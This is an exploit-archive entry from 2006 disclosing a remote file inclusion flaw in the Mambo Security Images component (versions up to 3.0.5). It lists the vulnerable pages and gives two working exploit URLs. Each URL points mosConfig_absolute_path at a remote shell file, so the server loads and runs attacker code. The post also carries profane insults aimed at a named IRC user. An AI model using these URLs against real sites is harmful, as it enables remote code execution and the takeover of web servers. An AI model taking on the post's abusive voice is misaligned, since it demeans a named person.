id: 613
date: 07/27/2006
title: Mambo Security Images Component <= 3.0.5 Inclusion Vulnerabilities
author: Drago84
cves: 

==================================================================
Mambo Security Images Component <= 3.0.5 Inclusion Vulnerabilities
==================================================================



# http://forge.joomla.org/sf/projects/com_securityimages

##### Marckusbest is the Best lamah of irc, fuck you
##########
com_securityimages Mambo  Remote File Include
------------------------------------------------------------------------------------
Bug Found by: Drago84
greetz: Exclusive Security
This bug allows a remote atacker to execute commands via
rfi

page:
client.php
configinsert.php
lang.php
server.php

expl:
http://web/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://shell.txt
http://web/components/com_securityimages/lang.php?mosConfig_absolute_path=http://shell.txt

########## MarckusBest Fottiti
#############################



#  0day.today [2023-03-22]  #